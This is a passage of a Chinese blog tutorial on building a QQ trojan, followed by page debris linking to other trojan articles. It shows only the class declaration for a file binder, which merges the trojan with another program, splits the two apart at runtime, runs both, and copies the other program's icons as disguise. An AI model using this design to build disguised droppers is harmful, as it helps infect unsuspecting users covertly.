自己动手做QQ木马--文件绑定篇(-)

原创 2003年03月28日 09:22:00
<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

自己动手做QQ木马--文件绑定篇

 

    在本篇中我将详细分析一下CBindFile类的实现细节。

先看看CBindFile类的声明吧!

class CBindFile : public CObject 

{

public:

      CBindFile();

      virtual ~CBindFile();

 

   static const char *const szFlag;            //文件被绑定过的标志

      static const unsigned int lenOrigin; //未绑定动态连接库时的文件大小

static const unsigned int lenOriginAddDll;  //绑定了动态连接库后的//文件大小

private:

   TCHAR my_name[MAX_PATH];           //自身文件名字

      TCHAR szMyFilePath[MAX_PATH];       //自身文件路径

      HANDLE hFileMyself;                   //自身文件句柄

 

   BYTE *buf;                          //读取文件数据缓冲

 

      CString strToBindFilePath;            //保存要绑定的文件名

      CString strFinalFilePath;              //保存最终合成文件名

      char m_Ext[4];                        //保存被绑定文件的扩展名

 

      CString strUnbindFilePath_Dll;         //分解出的DLL文件名

      CString strUnbindFilePath_Sec;         //分解出的Sec文件名

 

PROCESS_INFORMATION piRunProc;  //分解出的第二个文件运行//的进程信息

public:

      bool Initiate();                   //判断文件是绑定还是分解

      bool CloneMySelf_and_Run();     //克隆一个原文件并运行它

                                       //取得分解出文件运行的进程信息

      voidGetRunFileProcessInfo(PROCESS_INFORMATION&pi) const;

      CString GetSecFilePath() const;

private:

      bool Unbind_and_Run();         //分解已合并的文件,同时运行它们

   bool Bind_File();                //将自己和另一个文件绑定在一起

                                      //创建分解文件时的进程

      bool Create_Process(const char* temp_Run, BOOL bDirectRun);

      //判断是否是指定的文件名

      bool IsSpecFileName(const TCHAR * const szSpecFileName) const;

 

      void Modify_MyIcon(BYTE* &buf); //修改自身文件中的所有的图标

//在被绑定的PE文件中找到与自身文件中相匹配的图标

   BYTE* Find_Match_Icon(HMODULE hExeToBind, const RESDIR *pResDir);

 //枚举图标的回调函数                            

      static BOOL CALLBACK EnumIconProc( HMODULE hExe,

             LPCTSTR lpszType, 

             LPTSTR lpszName, 

             LPARAM lParam );

};

 

后面三个与图标相关的函数暂时不介绍,留在后面的攫取图标篇中详细说明。下面讲解几个重要的成员函数

1Initiate()

在第一篇中我已经讲过Initiate()成员函数是重点,它是整个类的枢纽。通过判断本程序文件的大小来分别执行相关的操作,且看下图:

Python编写简易木马程序

0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python...
  • aqzwss
  • aqzwss
  • 2015年05月28日 03:13
  • 2338

轮播banner,实现旋转木马效果,Galler 效果,可无限循环自动播放、拖拽

轮播banner,实现旋转木马效果,Galler 效果,可无限循环自动播放、拖拽基于上次修改完善,以解决解决与SlidingMenu的冲突,并完善改写自动轮播方法,可实现轮播banner,旋转木马效果...
  • ls498297458
  • ls498297458
  • 2016年10月26日 21:43
  • 1213

图解冰河木马一次使用过程

首先搜索 冰河木马 ,然后下载;一下载好,360即报木马; 因为目前是我们准备尝试一下干坏事,恢复之;信任之; 解压之后又报病毒; 恢复; 看下,一个客户端;一个服务端; 先走客户...
  • bcbobo21cn
  • bcbobo21cn
  • 2016年07月10日 23:13
  • 8875

Android自己动手做查找控件、绑定监听的注解框架

现在好多第三方开发框架都提供了注解方式设置控件绑定监听的方法。本着知其然知其所以然的态度,今天小菜自己撸了一遍,其中不少参考了xUtils的源码,在这里特别感谢下大神的开源精神,感谢巨人为我们提供肩膀...
  • w804518214
  • w804518214
  • 2015年09月13日 00:36
  • 749

JAVA贺新年-自己动手做QQ(P2P聊天工具含源码)

  • 2012年01月04日 11:42
  • 503KB
  • 下载

小白也可以自己动手做windows清垃圾清常见病毒的批处理文件

  • 2014年09月13日 18:16
  • 8KB
  • 下载

MFC 手把手 写一个文件播放小程序(这个是直接copy的 我会动手做一遍 然后发自己原创的)

 1、建立工程 1、建立一个MFC工程,命名为Tao_Music 2、选择为基本对话框 3、包含Windows Sockts 4、使用静态链接库 [方便一会直接生成的ex...
  • bjtu_dubing
  • bjtu_dubing
  • 2015年12月08日 13:10
  • 458

自己动手做系统教程

  • 2017年07月16日 15:32
  • 98B
  • 下载

自己动手做操作系统.pdf

  • 2009年03月29日 23:05
  • 20.42MB
  • 下载

自己动手做的悬浮的gif动画

  • 2011年06月10日 17:48
  • 834KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:自己动手做QQ木马--文件绑定篇(-)
举报原因:
原因补充:

(最多只允许输入30个字)